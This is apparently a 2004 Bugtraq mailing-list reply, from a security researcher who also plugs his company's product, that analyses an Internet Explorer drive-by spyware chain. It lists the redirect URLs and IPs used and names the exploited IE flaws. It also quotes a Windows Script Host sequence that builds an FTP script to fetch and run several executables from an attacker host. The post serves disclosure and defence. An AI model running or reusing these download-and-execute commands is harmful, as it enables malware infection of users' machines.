RE: Still Vulnerable in MSIE
Nothing new here, it's just one of the remaining IE vulnerabilities that
are not yet patched. If I dare allow a small product pitch, the publicly
available version of Qwik-Fix ( http://qwik-fix.net ) has protected
against threats such as this for more than half a year now, without
requiring any signature updates (since there are no need for
signatures).
This is not the first time that spyware has mixed with vulnerabilities,
exploits and worms. Spyware is increasingly becoming a corporate
liability, Robert Mitchell recently did a feature story on this at
http://www.computerworld.com/securitytopics/security/story/0,10801,92784
,00.html
The high of IE vulnerabilities on my Unpatched list was 32, right now we
are at about 12 that still have no patches. There's continuously new
research being posted to the Unpatched mailing list (
http://unpatched.pivxlabs.com ) on topics such as this spyware/worm
threat.
Anyway, back to hnc3k.com - there is obviously a lot happening on all of
these popups, and quite a number of IE exploits are being exploited. A
hint of caution, don't go to any of these pages without Qwik-Fix on your
machine, they contain malicious code which will execute on your system
if it does not have adequate protection. Another hint of caution, don't
panic if your AV labels this email as being naughty just because I
mention specific dirty words.
One of the pages that try to exploit IE vulnerabilities is at
http://65.17.207.40/framepb_1u.php
which redirects to
http://si1.default-homepage-network.com/180/180.htm?si-001
which redirects to
http://object.passthison.com/vu083003/object.cgi?si1
which uses the Object Data vulnerability to change your startpage to
http://default-homepage-network.com/start.cgi?hkcu
the parameter at the end is either HKCU or HKLM depending on what
registry branch lead you there. This serves to notify
default-homepage-network whether your machine has been compromised with
user or administrator privileges
start.cgi also opens a few popup windows with advertisements, after
which it opens the following page
http://default-homepage-network.com/newspynotice.html
that wants to sell you a cure against spyware which hijacks your start
page - as theirs just did.
That page also secretly opens
http://object.passthison.com/vu083003/newobject1.cgi
http://69.50.139.61/hp1/hp1.htm
http://www.achtungachtung.com/0021/index.php
newobject1.cgi executes the following commands through the Windows
Script Host object:
wsh.Run('command /C echo open
downloads.default-homepage-network.com>o',false,6);
wsh.Run('command /C echo tmpacct>>o',false,6);
wsh.Run('command /C echo 12345>>o',false,6);
wsh.Run('command /C echo bin>>o',false,6);
wsh.Run('command /C echo get install2.exe>>o',false,6);
wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6);
wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
wsh.Run('command /C echo get CS4P028.exe>>o',false,6);
wsh.Run('command /C echo bye>>o',false,6);
wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o
>o.bat',false,6);
wsh.Run('command /C echo if exist install2.exe install2.exe
>>o.bat',false,6);
wsh.Run('command /C echo if exist infamous_downloader.exe
infamous_downloader.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
>>o.bat',false,6);
wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe
>>o.bat',false,6);
wsh.Run('command /C o.bat',false,6);
Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch
http://69.50.139.61/hp1/HP1.chm::/hp1.htm
framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which
uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
Other files that are attempted to be delivered are
http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe
http://validation-required.info/
http://www.popmoney.net/ip/index.php
http://www.portalone.hostance.com.com/italia.exe
Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@xxxxxxxx
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
PivX defines a new genre in Desktop Security: Proactive Threat
Mitigation.
<http://www.pivx.com/qwikfix>
-----Original Message-----
From: Greg Kujawa [mailto:greg.kujawa@xxxxxxxxxxxxxxxxx]
Sent: Friday, May 14, 2004 7:37 AM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Still Vulnerable in MSIE
With the latest vendor AV definitions and all of the Microsoft Security
Updates my MSIE 6 application still was vulnerable to some apparent
cross-site scripting exploit. I was hit with one of the many Agobot
variants when exiting a site detailing some IE vulnerabilities
(http://www.hnc3k.com). The site exit led to a series of pop-up and
pop-under ads.
All of these site redirects apparently resulted in a www2.flingstone.com
site dropping in a infamous.exe file onto my computer. All the while I
saw no prompts to download or execute anything whatsoever. All I did was
close the windows that were coming up.
Just an FYI since even the latest updates on all fronts cannot ensure
peace of mind.